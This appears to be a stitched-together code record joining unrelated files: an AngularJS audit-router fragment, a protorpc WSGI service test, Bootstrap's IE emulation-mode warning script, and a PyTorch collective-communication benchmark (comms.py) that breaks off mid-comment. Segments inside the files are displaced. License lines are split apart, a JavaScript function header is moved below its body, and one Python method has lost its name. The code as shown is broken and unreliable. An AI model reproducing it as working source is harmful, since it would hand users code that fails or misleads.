return ApiService.getApiEvents($stateParams.apiId, eventTypes);
}
},
data: {
perms: {
only: ['api-event-r']
},
docs: {
page: 'management-api-history'
}
}
})
.state('management.apis.detail.audit.events', {
url: '/events',
template: require('./events/apiEvents.html'),
controller: 'ApiEventsController',
controllerAs: 'apiEventsCtrl',
resolve: {
resolvedEvents: function ($stateParams, ApiService) {
const eventTypes = 'START_API,STOP_API';
return ApiService.getApiEvents($stateParams.apiId, eventTypes);
}
},
data: {
perms: {
only: ['api-event-r']
},
docs: {
page: 'management-api-events'
}
}
});
}
| apisAuditRouterConfig |
service_test.py | #!/usr/bin/env python
#
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""WSGI application tests."""
__author__ = '[email protected] (Rafe Kaplan)'
import unittest
from protorpc import end2end_test
from protorpc import protojson
from protorpc import remote
from protorpc import registry
from protorpc import transport
from protorpc import test_util
from protorpc import webapp_test_util
from protorpc.wsgi import service
from protorpc.wsgi import util
class ServiceMappingTest(end2end_test.EndToEndTest):
def setUp(self):
self.protocols = None
remote.Protocols.set_default(remote.Protocols.new_default())
super(ServiceMappingTest, self).setUp()
def CreateServices(self):
return my_service, my_other_service
def CreateWsgiApplication(self):
"""Create WSGI application used on the server side for testing."""
my_service = service.service_mapping(webapp_test_util.TestService,
'/my/service')
my_other_service = service.service_mapping(
webapp_test_util.TestService.new_factory('initialized'),
'/my/other_service',
protocols=self.protocols)
return util.first_found([my_service, my_other_service])
def testAlternateProtocols(self):
self.protocols = remote.Protocols()
self.protocols.add_protocol(protojson, 'altproto', 'image/png')
global_protocols = remote.Protocols()
global_protocols.add_protocol(protojson, 'server-side-name', 'image/png')
remote.Protocols.set_default(global_protocols)
self.ResetServer()
self.connection = transport.HttpTransport(
self.service_url, protocol=self.protocols.lookup_by_name('altproto'))
self.stub = webapp_test_util.TestService.Stub(self.connection)
self.stub.optional_message(string_value='alternate-protocol')
def testAlwaysUseDefaults(self):
new_protocols = remote.Protocols()
new_protocols.add_protocol(protojson, 'altproto', 'image/png')
self.connection = transport.HttpTransport(
self.service_url, protocol=new_protocols.lookup_by_name('altproto'))
self.stub = webapp_test_util.TestService.Stub(self.connection)
self.assertRaisesWithRegexpMatch(
remote.ServerError,
'HTTP Error 415: Unsupported Media Type',
self.stub.optional_message, string_value='alternate-protocol')
remote.Protocols.set_default(new_protocols)
self.stub.optional_message(string_value='alternate-protocol')
class ProtoServiceMappingsTest(ServiceMappingTest):
def CreateWsgiApplication(self):
"""Create WSGI application used on the server side for testing."""
return service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
])
def GetRegistryStub(self, path='/protorpc'):
service_url = self.make_service_url(path)
transport = self.CreateTransport(service_url)
return registry.RegistryService.Stub(transport)
def testRegistry(self):
registry_client = self.GetRegistryStub()
response = registry_client.services()
self.assertIterEqual([
registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
], response.services)
def testRegistryDictionary(self):
self.ResetServer(service.service_mappings(
{'/my/service': webapp_test_util.TestService,
'/my/other_service':
webapp_test_util.TestService.new_factory('initialized'),
}))
registry_client = self.GetRegistryStub()
response = registry_client.services()
self.assertIterEqual([
registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
], response.services)
def testNoRegistry(self):
self.ResetServer(service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
],
registry_path=None))
registry_client = self.GetRegistryStub()
self.assertRaisesWithRegexpMatch(
remote.ServerError,
'HTTP Error 404: Not Found',
registry_client.services)
def testAltRegistry(self):
self.ResetServer(service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
],
registry_path='/registry'))
registry_client = self.GetRegistryStub('/registry')
services = registry_client.services()
self.assertTrue(isinstance(services, registry.ServicesResponse))
self.assertIterEqual(
[registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
],
services.services)
def testDuplicateRegistryEntry(self):
self.assertRaisesWithRegexpMatch(
remote.ServiceConfigurationError,
"Path '/my/service' is already defined in service mapping",
service.service_mappings,
[('/my/service', webapp_test_util.TestService),
('/my/service',
webapp_test_util.TestService.new_factory('initialized'))
])
def testRegex(self):
self.ResetServer(service.service_mappings(
[('/my/[0-9]+', webapp_test_util.TestService.new_factory('service')),
('/my/[a-z]+',
webapp_test_util.TestService.new_factory('other-service')),
]))
my_service_url = 'http://localhost:%d/my/12345' % self.port
my_other_service_url = 'http://localhost:%d/my/blarblar' % self.port
my_service = webapp_test_util.TestService.Stub(
transport.HttpTransport(my_service_url))
my_other_service = webapp_test_util.TestService.Stub(
transport.HttpTransport(my_other_service_url))
response = my_service.init_parameter()
self.assertEqual('service', response.string_value)
response = my_other_service.init_parameter()
self.assertEqual('other-service', response.string_value)
def main():
unittest.main()
if __name__ == '__main__':
main() | # Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, |
ie-emulation-modes-warning.js | // NOTICE!! DO NOT USE ANY OF THIS JAVASCRIPT
// IT'S JUST JUNK FOR OUR DOCS!
// ++++++++++++++++++++++++++++++++++++++++++
/*!
* Copyright 2014-2015 Twitter, Inc.
*
* Licensed under the Creative Commons Attribution 3.0 Unported License. For
* details, see https://creativecommons.org/licenses/by/3.0/.
*/
// Intended to prevent false-positive bug reports about Bootstrap not working properly in old versions of IE due to folks testing using IE's unreliable emulation modes.
(function () {
'use strict';
function emulatedIEMajorVersion() {
    var groups = /MSIE ([0-9.]+)/.exec(window.navigator.userAgent)
if (groups === null) {
return null
}
    var ieVersionNum = parseInt(groups[1], 10)
    var ieMajorVersion = Math.floor(ieVersionNum)
return ieMajorVersion | // Detects the actual version of IE in use, even if it's in an older-IE emulation mode.
// IE JavaScript conditional compilation docs: https://msdn.microsoft.com/library/121hztk3%28v=vs.94%29.aspx
// @cc_on docs: https://msdn.microsoft.com/library/8ka90k2e%28v=vs.94%29.aspx
    var jscriptVersion = new Function('/*@cc_on return @_jscript_version; @*/')() // jshint ignore:line
if (jscriptVersion === undefined) {
      return 11 // IE11+ not in emulation mode
}
if (jscriptVersion < 9) {
      return 8 // IE8 (or lower; haven't tested on IE<8)
}
    return jscriptVersion // IE9 or IE10 in any mode, or IE11 in non-IE11 mode
}
  var ua = window.navigator.userAgent
if (ua.indexOf('Opera') > -1 || ua.indexOf('Presto') > -1) {
    return // Opera, which might pretend to be IE
}
  var emulated = emulatedIEMajorVersion()
if (emulated === null) {
    return // Not IE
}
  var nonEmulated = actualNonEmulatedIEMajorVersion()
if (emulated !== nonEmulated) {
window.alert('WARNING: You appear to be using IE' + nonEmulated + ' in IE' + emulated + ' emulation mode.\nIE emulation modes can behave significantly differently from ACTUAL older versions of IE.\nPLEASE DON\'T FILE BOOTSTRAP BUGS based on testing in IE emulation modes!')
}
})(); | }
function actualNonEmulatedIEMajorVersion() { |
comms.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import time
import comms_utils
import numpy as np
# pytorch
import torch
from comms_utils import paramCommsBench, ensureTensorFlush
### TODO: add these to class variables?
supportedCollectives = [
"reduce",
"all_reduce",
"all_to_all",
"all_to_allv",
"all_gather",
"broadcast",
"reduce_scatter",
"reduce_scatter_base",
"all_gather_base",
"incast",
"multicast",
] # , "scatter", "gather"]
pt2ptPatterns = [
"one2one",
"pairwise",
]
logger = logging.getLogger(__name__)
class MultilineFormatter(argparse.ArgumentDefaultsHelpFormatter):
def _split_lines(self, text, width):
if text.startswith("R|"):
return text[2:].splitlines()
# this is the RawTextHelpFormatter._split_lines
return argparse.ArgumentDefaultsHelpFormatter._split_lines(self, text, width)
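# MultilineFormatter preserves explicit line breaks in help strings prefixed
# with "R|", e.g. help="R|first line.\nsecond line." renders as two lines in
# --help output instead of being re-wrapped.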
# define the collective benchmark
class commsCollBench(paramCommsBench):
def __init__(self):
super().__init__(supportedNwstacks=["pytorch-dist", "pytorch-xla-tpu"])
# def readCollArgs(self, parser):
def readArgs(self, parser):
# read the common/basic arguments
super().readArgs(parser)
parser.add_argument(
"--w", type=int, default=5, help="number of warmup iterations"
) # number of warmup-iterations
parser.add_argument(
"--n", type=int, default=5, help="number of iterations"
) # number of iterations
# experiment related parameters
parser.add_argument(
"--mode",
type=str,
default="comms",
help="benchmark mode",
choices=["comms", "compute", "dlrm", "comms-compute"],
) # alternative is DLRM mode or comm-compute mode
parser.add_argument(
"--b", type=str, default="8", help="minimum size, in bytes, to start with"
) # COMMS mode, begin the sweep at.
parser.add_argument(
"--e", type=str, default="64", help="maximum size, in bytes, to end at"
) # COMMS mode, end the sweep at.
parser.add_argument(
"--f", type=int, default=2, help="multiplication factor between sizes"
) # COMMS mode, multiplication factor.
parser.add_argument(
"--collective",
type=str,
default="all_reduce",
help="Collective operation to be evaluated",
choices=supportedCollectives,
) # collective op to benchmark
# For comm-compute or compute mode
parser.add_argument(
"--kernel",
type=str,
default="gemm",
help="Compute kernel, used for comms-compute or compute mode",
choices=["gemm", "emb_lookup"],
) # Compute kernel: "gemm"
parser.add_argument(
"--num-compute",
type=int,
default=100,
help="one collective for every NUM_COMPUTE compute kernels",
) # Launch one coll for every n compute kernels
# For GEMM
parser.add_argument(
"--mm-dim",
type=int,
default=100,
help="dimension size for GEMM compute kernel",
) # Matrix multiplication dim n, A[n,n] * B [n,n]
# For emb lookup
parser.add_argument(
"--emb-dim",
type=int,
default=128,
help="dimension size for Embedding table compute kernel",
) # Embedding table dimension
parser.add_argument(
"--num-embs",
type=int,
default=100000,
help="Embedding table hash size for Embedding table compute kernel",
) # Embedding table hash size
parser.add_argument(
"--avg-len",
type=int,
default=28,
help="Average lookup operations per sample",
) # Average #lookup per sample
parser.add_argument(
"--batch-size",
type=int,
default=512,
help="number of samples reading the table concurrently",
) # #Samples reading the table concurrently
parser.add_argument(
"--root", type=int, default=0, help="root process for reduce benchmark"
) # root process for reduce and bcast (and gather, scatter, etc., if support in the future)
        # TODO: check the correctness of root; it should be between 0 and world_size - 1
parser.add_argument(
"--src-ranks",
type=str,
nargs="?",
help="R|src ranks for many-to-one incast pattern or pt2pt.\n"
"List of ranks separated by comma or a range specified by start:end.\n"
"Pt2pt one2one should set only one rank.\n"
"The default value of incast includes all ranks, pt2pt includes rank 0.",
) # optional: group of src ranks in many-to-one incast or pt2pt
parser.add_argument(
"--dst-ranks",
type=str,
nargs="?",
help="R|dst ranks for one-to-many multicast pattern or pt2pt.\n"
"List of ranks separated by comma or a range specified by start:end.\n"
"Pt2pt one2one should set only one rank\n"
"The default value of multicast includes all ranks, pt2pt includes rank 1.",
) # optional: group of dst ranks in one-to-many multicast or pt2pt
parser.add_argument(
"--pair",
action="store_true",
default=False,
help="Toggle to enable collective pair mode",
)
parser.add_argument(
"--collective-pair",
type=str,
default="all_reduce",
help="Collective pair operation to be evaluated",
choices=supportedCollectives,
) # collective op to pair with the other collective, --collective should be non-empty
parser.add_argument(
"--overlap-pair-pgs",
action="store_true",
default=False,
help="Toggle to enable overlapping collective pair with two pgs",
) # overlap collective pair with two pgs
parser.add_argument(
"--pt2pt",
type=str,
default=None,
help="point to point pattern",
choices=pt2ptPatterns,
) # point to point mode
parser.add_argument(
"--window",
type=int,
default=100,
help="window size for pt2pt throughput test",
) # optional: point to point throughput test window size
return parser.parse_known_args()
def checkArgs(self, args):
super().checkArgs(args)
if args.pt2pt is not None:
args.collective = "pt2pt"
if args.pt2pt not in pt2ptPatterns:
logger.error(
f"Specified pt2pt pattern: {args.pt2pt} is not one of the supported pt2pt patterns: {str(pt2ptPatterns)}"
)
comms_utils.gracefulExit()
args.b = comms_utils.parsesize(args.b)
args.e = comms_utils.parsesize(args.e)
args.dtype = self.dtypeMap[args.data_type]
if args.b < 1:
logger.warning(
f"Starting size (--b {args.b}) should be greater than 1 byte...fix and continue"
)
args.b = 1
if args.e < args.b:
logger.warning(
f"the begin-size (--b {args.b}) is larger than the end-size (--e {args.e})"
)
if args.device == "cpu" and args.backend == "nccl":
raise ValueError(f"NCCL is not supported for device type {args.device}")
if args.c == 1 and args.z == 0 and args.collective in ("all_reduce", "reduce", "reduce_scatter"):
logger.warning(
f"Data validation is not supported for {args.collective} in non-blocking mode, disabled and continue"
)
args.c = 0
# run a few sanity checks
if args.bitwidth < 32:
if args.device != "cuda":
logger.error(
f"collective quantization may not be fully supported for {args.device}"
)
comms_utils.checkQuantArgs(
args.collective,
args.dtype,
args.b,
args.quant_a2a_embedding_dim,
args.z,
)
def runColl(self, comm_fn=None, compute_fn=None, comm_fn_pair=None):
self.backendFuncs.complete_accel_ops(self.collectiveArgs, initOp=True)
self.backendFuncs.sync_barrier(self.collectiveArgs, desc="runColl_begin")
elapsedTimeNS = 0.0
is_blocking = not self.collectiveArgs.asyncOp
        enable_comms = not (comm_fn is None or comm_fn == self.backendFuncs.noop)
        enable_compute = not (compute_fn is None or compute_fn == self.backendFuncs.noop)
        enable_comms_pair = not (comm_fn_pair is None or comm_fn_pair == self.backendFuncs.noop)
# for comms pair mode, force async comms for overlapping evaluation
if enable_comms_pair:
self.collectiveArgs.asyncOp = True
for nIter in range(
self.collectiveArgs.numWarmupIters + self.collectiveArgs.numIters
):
if nIter == self.collectiveArgs.numWarmupIters:
# Flush non-blocking ops to ensure warmup is really complete
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
ensureTensorFlush(self.collectiveArgs.opTensor)
if enable_comms_pair:
ensureTensorFlush(self.collectiveArgs.opTensor_pair)
# Start measuring time after warmup iterations
elapsedTimeNS = 0.0
self.collectiveArgs.quant_time.reset()
self.collectiveArgs.dequant_time.reset()
# reset tensor values for data validation check
if enable_comms:
self.setTensorVal(self.collectiveArgs.opTensor)
# for blocking mode, do barrier before starting collective
if is_blocking:
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic() # available only in py3
self.collectiveArgs.group = self.backendFuncs.get_next_group()
comm_fn(self.collectiveArgs)
            # post another collective in comms pair mode, otherwise it's a noop
self.collectiveArgs.group = self.backendFuncs.get_next_group()
comm_fn_pair(self.collectiveArgs, pair=enable_comms_pair)
if enable_compute:
for _ in range(self.collectiveArgs.numComputePerColl):
# TODO: investigate the cache effect
# Flush the cache
# _ = torch.rand(6 * 1024 * 1024 // 4).float() * 2 # V100 6MB L2 cache
compute_fn(self.collectiveArgs)
            if is_blocking:  # should be synchronous, wait for the collective
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
# Measuring time.
elapsedTimeNS += (
time.monotonic() - start
            ) * 1e9  # keeping time in NS helps in dividing data by nanoseconds
start = time.monotonic() # available only in py3
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
end = time.monotonic() # available only in py3
ensureTensorFlush(self.collectiveArgs.opTensor)
if enable_comms_pair:
ensureTensorFlush(self.collectiveArgs.opTensor_pair)
elapsedTimeNS += (
end - start
        ) * 1e9  # keeping time in NS helps in dividing data by nanoseconds
memSize = self.backendFuncs.get_mem_size(self.collectiveArgs)
avgIterNS, algBW = comms_utils.getAlgBW(
elapsedTimeNS, memSize, self.collectiveArgs.numIters
)
busBW = self.backendFuncs.getBusBW(
self.collectiveArgs.collective,
algBW,
self.collectiveArgs,
)
if enable_comms_pair:
memSize_pair = self.backendFuncs.get_mem_size(
self.collectiveArgs, pair=enable_comms_pair
)
memSize += memSize_pair
_, algBW_pair = comms_utils.getAlgBW(
elapsedTimeNS, memSize_pair, self.collectiveArgs.numIters
)
algBW += algBW_pair
busBW += self.backendFuncs.getBusBW(
self.collectiveArgs.collective_pair,
algBW_pair,
self.collectiveArgs,
)
self.backendFuncs.sync_barrier(self.collectiveArgs, desc="runColl_end")
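        # Units (sketch, assuming comms_utils.getAlgBW reports bytes per
        # nanosecond, i.e. GB/s): timeUS is the average per-iteration latency
        # in microseconds; algBW and busBW are bandwidths; memSize is bytes.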
results = {
"timeUS": avgIterNS / 1e3,
"algBW": algBW,
"busBW": busBW,
"memSize": memSize,
}
return results
def runPt2Pt(self):
self.backendFuncs.complete_accel_ops(self.collectiveArgs, initOp=True)
# warm-up
memSize = self.backendFuncs.get_mem_size(self.collectiveArgs)
self.getPingLatency(self.collectiveArgs.numWarmupIters)
self.getPingPongLatency(self.collectiveArgs.numWarmupIters)
self.getUniBW(self.collectiveArgs.numWarmupIters, memSize)
self.getBiBW(self.collectiveArgs.numWarmupIters, memSize)
self.backendFuncs.sync_barrier(self.collectiveArgs, "runpt2pt_begin")
# pt2pt benchmark
pingPerIterNS = self.getPingLatency(self.collectiveArgs.numIters)
pingPongPerIterNS = self.getPingPongLatency(self.collectiveArgs.numIters)
avgUniBW = self.getUniBW(self.collectiveArgs.numIters, memSize)
avgBiBW = self.getBiBW(self.collectiveArgs.numIters, memSize)
self.backendFuncs.sync_barrier(self.collectiveArgs, "runpt2pt")
results = {
"pingPerIterNS": pingPerIterNS,
"pingPongPerIterNS": pingPongPerIterNS,
"avgUniBW": avgUniBW,
"avgBiBW": avgBiBW,
"memSize": memSize,
}
return results
def getPingLatency(self, numIters):
logger.debug(
"STATUS: begin ping test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = False
# get one-way latency
pingLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
pingLatencyNS.append(
(time.monotonic() - start) * 1e9
            )  # keeping time in NS helps in dividing data by nanoseconds
logger.debug("STATUS: end ping test.")
return pingLatencyNS
def getPingPongLatency(self, numIters):
logger.debug(
"STATUS: begin ping-pong with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = False
# get round-trip latency
pingPongLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
pingPongLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS helps when dividing data by nanoseconds
logger.debug("STATUS: end ping-pong test.")
return pingPongLatencyNS
def | (self, numIters, memSize):
logger.debug(
"STATUS: begin UniBW test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = True
# get unidirectional bandwidth
uniLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
for w in range(self.collectiveArgs.window):
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.isend(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx], tag=w
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.irecv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx], tag=w
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
uniLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS helps when dividing data by nanoseconds
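# `window` isends/irecvs are posted per timed iteration before the wait, so
# dividing each iteration time by the window size yields per-message latency.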
uniLatencyNS = [lat / self.collectiveArgs.window for lat in uniLatencyNS]
uniLatencyNS = np.mean(np.array(uniLatencyNS))
_, avgUniBW = comms_utils.getAlgBW(uniLatencyNS, memSize, 1)
logger.debug("STATUS: end UniBW test.")
return avgUniBW
def getBiBW(self, numIters, memSize):
logger.debug(
"STATUS: begin BiBW test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = True
# get bidirectional bandwidth
biLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
for w in range(self.collectiveArgs.window):
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.isend(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx], tag=w
)
self.backendFuncs.irecv(
self.collectiveArgs,
self.collectiveArgs.dst_ranks[idx],
tag=w + self.collectiveArgs.window,
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.irecv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx], tag=w
)
self.backendFuncs.isend(
self.collectiveArgs,
self.collectiveArgs.src_ranks[idx],
tag=w + self.collectiveArgs.window,
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
biLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS helps when dividing data by nanoseconds
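# As in getUniBW, normalize by the window size; the bandwidth below uses
# 2 * memSize because every rank both sends and receives per message slot.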
biLatencyNS = [lat / self.collectiveArgs.window for lat in biLatencyNS]
biLatencyNS = np.mean(np.array(biLatencyNS))
_, avgBiBW = comms_utils.getAlgBW(biLatencyNS, 2 * memSize, 1)
logger.debug("STATUS: end UniBW test.")
return avgBiBW
def checkPt2PtRanks(self):
# set default values
if not self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks = [0]
if not self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks = [1]
# sanity check
if self.collectiveArgs.pt2pt == "one2one":
if (
len(self.collectiveArgs.src_ranks) > 1
or len(self.collectiveArgs.dst_ranks) > 1
):
if self.global_rank == 0:
logger.error(
"One2one Pt2Pt requires only a single rank is specified in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
elif self.collectiveArgs.pt2pt == "pairwise":
# pairwise pt2pt requires identical number of ranks in src_ranks and dst_ranks.
if len(self.collectiveArgs.src_ranks) != len(self.collectiveArgs.dst_ranks):
if self.global_rank == 0:
logger.error(
"Pairwise Pt2Pt requires identical number of members in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
# pairwise pt2pt does not allow same rank to exist in both groups
if bool(
set(self.collectiveArgs.src_ranks).intersection(
self.collectiveArgs.dst_ranks
)
):
if self.global_rank == 0:
logger.error(
"Pairwise Pt2Pt requires distinct members in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
if self.global_rank == 0:
print(
f"\t collective={self.collectiveArgs.collective}\t{self.collectiveArgs.pt2pt}, src_ranks={self.collectiveArgs.src_ranks}, dst_ranks={self.collectiveArgs.dst_ranks}"
)
def checkCollectiveRanks(self):
if self.collectiveArgs.collective == "incast":
# incast: set default value and exclude root
if not self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks = [*range(self.comm_size)]
if self.collectiveArgs.srcOrDst in self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks.remove(self.collectiveArgs.srcOrDst)
elif self.collectiveArgs.collective == "multicast":
# multicast: set default value and exclude root
if not self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks = [*range(self.comm_size)]
if self.collectiveArgs.srcOrDst in self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks.remove(self.collectiveArgs.srcOrDst)
if self.global_rank == 0:
print(
f"\t collective={self.collectiveArgs.collective}, src_ranks={self.collectiveArgs.src_ranks}, dst_ranks={self.collectiveArgs.dst_ranks}"
)
def initCollectiveArgs(self, commsParams):
# lint was complaining that benchTime was too complex!
(
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
) = comms_utils.get_rank_details(
self.backendFuncs
) # Getting ranks from the backendFuncs object, since we cannot use MPI (e.g., on TPU) to launch all the processes.
self.backendFuncs.sayHello() # Informs us where each process is running.
groups = self.backendFuncs.get_groups()
num_pgs = len(groups)
self.comm_size = world_size
self.global_rank = global_rank
comms_utils.fixBeginSize(
commsParams, world_size
) # Ensuring that all-reduce and all-to-all have at least one member per rank.
allSizes = comms_utils.getSizes(
commsParams.beginSize, commsParams.endSize, commsParams.stepFactor
) # Given the begin size, end size, and step factor, compute the message sizes to iterate over.
if global_rank == 0:
print(
f"[Rank {global_rank:>3}] allSizes: {allSizes} local_rank: {local_rank} element_size: {commsParams.element_size}"
)
self.collectiveArgs.group = group
self.collectiveArgs.groups = groups
self.collectiveArgs.num_pgs = num_pgs
self.collectiveArgs.device = curDevice
self.collectiveArgs.world_size = world_size
self.collectiveArgs.numIters = commsParams.numIters
self.collectiveArgs.numWarmupIters = commsParams.numWarmupIters
self.collectiveArgs.global_rank = global_rank
self.collectiveArgs.backendFuncs = self.backendFuncs
self.collectiveArgs.collective = commsParams.collective
op = self.backendFuncs.get_reduce_op("sum")
self.collectiveArgs.op = op
self.collectiveArgs.srcOrDst = commsParams.srcOrDst
self.collectiveArgs.src_ranks = commsParams.src_ranks
self.collectiveArgs.dst_ranks = commsParams.dst_ranks
self.collectiveArgs.pair = commsParams.pair
self.collectiveArgs.collective_pair = commsParams.collective_pair
self.collectiveArgs.pt2pt = commsParams.pt2pt
self.collectiveArgs.window = commsParams.window
self.collectiveArgs.asyncOp = commsParams.blockingFlag != 1  # blocking flag set => synchronous ops
if commsParams.bitwidth < 32:
comms_utils.initQuantCommCtx(self.collectiveArgs, commsParams)
if self.collectiveArgs.collective == "pt2pt":
self.checkPt2PtRanks()
else:
self.checkCollectiveRanks()
computeFunc = self.backendFuncs.noop
if (
commsParams.mode != "comms"
): # Compute mode related initialization if not in comms-only mode
if commsParams.kernel == "gemm":
computeFunc = self.backendFuncs.gemm
mm_dim = commsParams.mm_dim
in1 = np.random.rand(mm_dim, mm_dim)
MMin1 = torch.FloatTensor(in1).to(curDevice)
in2 = np.random.rand(mm_dim, mm_dim)
MMin2 = torch.FloatTensor(in2).to(curDevice)
in3 = np.random.rand(mm_dim, mm_dim)
MMin3 = torch.FloatTensor(in3).to(curDevice)
MMout = self.backendFuncs.alloc_empty(
[mm_dim, mm_dim], commsParams.dtype, curDevice
)
self.collectiveArgs.MMout = MMout
self.collectiveArgs.MMin1 = MMin1
self.collectiveArgs.MMin2 = MMin2
self.collectiveArgs.MMin3 = MMin3
self.collectiveArgs.numComputePerColl = commsParams.num_compute
elif commsParams.kernel == "emb_lookup":
computeFunc = self.backendFuncs.emb_lookup
emb_dim = commsParams.emb_dim
num_embeddings = commsParams.num_embs
avg_length = commsParams.avg_len
batch_size = commsParams.batch_size
print(
f"emb_dim {emb_dim} num_embs {num_embeddings} avg_len {avg_length} bs {batch_size}"
)
self.collectiveArgs.EmbWeights = self.backendFuncs.alloc_empty(
[num_embeddings, emb_dim], torch.double, curDevice
)
self.collectiveArgs.TableOffsets = torch.LongTensor(
[0, num_embeddings]
).to(curDevice)
self.collectiveArgs.Indices = torch.LongTensor(
np.random.randint(0, num_embeddings - 1, avg_length * batch_size)
).to(curDevice)
lengths = np.ones((1, batch_size)) * avg_length
flat_lengths = lengths.flatten()
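# EmbeddingBag-style offsets: prepend 0 and take the cumulative sum of the
# per-sample lengths, e.g. lengths [2, 2, 2] -> offsets [0, 2, 4, 6].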
self.collectiveArgs.Offsets = torch.LongTensor(
[0] + np.cumsum(flat_lengths).tolist()
).to(curDevice)
self.collectiveArgs.LookupOut = self.backendFuncs.alloc_empty(
[batch_size, emb_dim], torch.double, curDevice
)
self.collectiveArgs.AvgLengths = avg_length
self.collectiveArgs.numComputePerColl = commsParams.num_compute
return (
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
allSizes,
computeFunc,
)
def gatherBenchTime(self, collectiveArgs, commsParams, timeUsElapsedList):
# Push the list to device, then do an all-gather.
timeElapsedTensor = torch.tensor(
timeUsElapsedList, device=self.backendFuncs.get_device()
)
collectiveArgs.opTensor = None
if commsParams.backend != "xla":
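# torch.distributed-style all_gather expects a pre-allocated list with one
# output tensor per rank; unbind(0) turns the (world_size, ...) buffer into
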